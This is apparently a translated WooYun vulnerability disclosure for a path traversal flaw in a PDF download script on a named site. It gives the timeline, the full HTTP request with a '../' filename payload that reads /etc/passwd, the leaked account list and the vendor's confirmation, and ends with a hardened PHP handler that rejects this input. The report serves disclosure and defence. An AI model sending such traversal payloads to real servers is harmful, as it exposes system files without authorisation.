WooYun (WooYun.org) historical vulnerability lookup: http://wy.zone.ci/
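2015-08-16: Details reported to the vendor; awaiting vendor handling
2015-08-18: Vendor confirmed; details disclosed to the vendor only
2015-08-28: Details disclosed to core white hats and experts in related fields
2015-09-07: Details disclosed to regular white hats
2015-09-17: Details disclosed to intern white hats
2015-10-02: Details disclosed to the public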
Could the vendor >>in good conscience<< give this a high rank and not ignore it!!!!!
GET //downloadPDF.php?filename=../../../../../../../../../../etc/passwd HTTP/1.1
Host: icp.now.cn
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.107 Safari/537.36
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=ncc0vk96i7fl4g97e3cnfbpps5
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/bash
daemon:x:2:2:Daemon:/sbin:/bin/bash
lp:x:4:7:Printing daemon:/var/spool/lpd:/bin/bash
mail:x:8:12:Mailer daemon:/var/spool/clientmqueue:/bin/false
news:x:9:13:News system:/etc/news:/bin/bash
uucp:x:10:14:Unix-to-Unix CoPy system:/etc/uucp:/bin/bash
games:x:12:100:Games account:/var/games:/bin/bash
man:x:13:62:Manual pages viewer:/var/cache/man:/bin/bash
wwwrun:x:30:8:WWW daemon apache:/var/lib/wwwrun:/bin/false
ftp:x:40:49:FTP account:/srv/ftp:/bin/bash
nobody:x:65534:65533:nobody:/var/lib/nobody:/bin/bash
messagebus:*:100:101:User for D-Bus:/var/run/dbus:/bin/false
sshd:*:101:102:SSH daemon:/var/lib/sshd:/bin/false
usbmux:x:102:65534:usbmuxd daemon:/var/lib/usbmuxd:/sbin/nologin
ntp:x:74:104:NTP daemon:/var/lib/ntp:/bin/false
statd:x:103:65534:NFS statd daemon:/var/lib/nfs:/sbin/nologin
mysql:x:104:105:MySQL server:/var/lib/mysql:/bin/bash
httpd:x:1000:1000::/home/httpd:/sbin/nologin
git:x:1001:100::/home/git:/bin/bash
reboot:x:1002:100::/home/reboot:/bin/bash
Severity: High
Vulnerability Rank: 10
Confirmed at: 2015-08-18 12:58
We will fix it as soon as possible. Thank you for reporting the vulnerability ^_^
None yet
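
A hardened form of a download handler like `downloadPDF.php`, as an added example (not the vendor's code, which the report does not show). The storage directory `PDF_DIR` and the function names `resolve_pdf` and `send_pdf` are assumptions; the rejected input is the `filename` value from the request above.

```php
<?php
// Added example: hypothetical hardened download handler. PDF_DIR and the
// function names are assumptions, not taken from the affected application.
const PDF_DIR = '/srv/app/pdf';   // assumed storage directory

function resolve_pdf(string $baseDir, string $name): ?string
{
    // Allow only a plain file name: no separators, no dots except ".pdf".
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\.pdf\z/', $name)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $path === false) {
        return null;                       // missing directory or file
    }
    // Containment check after symlinks and ".." have been resolved.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return is_file($path) ? $path : null;
}

function send_pdf(string $name): void
{
    $path = resolve_pdf(PDF_DIR, $name);
    if ($path === null) {
        http_response_code(404);           // same answer for every rejection
        return;
    }
    header('Content-Type: application/pdf');
    header('Content-Disposition: attachment; filename="' . basename($path) . '"');
    header('Content-Length: ' . filesize($path));
    header('X-Content-Type-Options: nosniff');
    readfile($path);
}

if (PHP_SAPI !== 'cli') {
    $name = $_GET['filename'] ?? '';
    send_pdf(is_string($name) ? $name : '');   // arrays (filename[]=) rejected
} else {
    // Constructed self-check: the report's traversal value must be rejected.
    $probe = '../../../../../../../../../../etc/passwd';
    echo resolve_pdf(sys_get_temp_dir(), $probe) === null ? "rejected\n" : "ACCEPTED\n";
}
```

The allow-list on the file name and the `realpath` containment check are independent layers: the second still holds if the pattern is later loosened or a symlink is placed inside the storage directory.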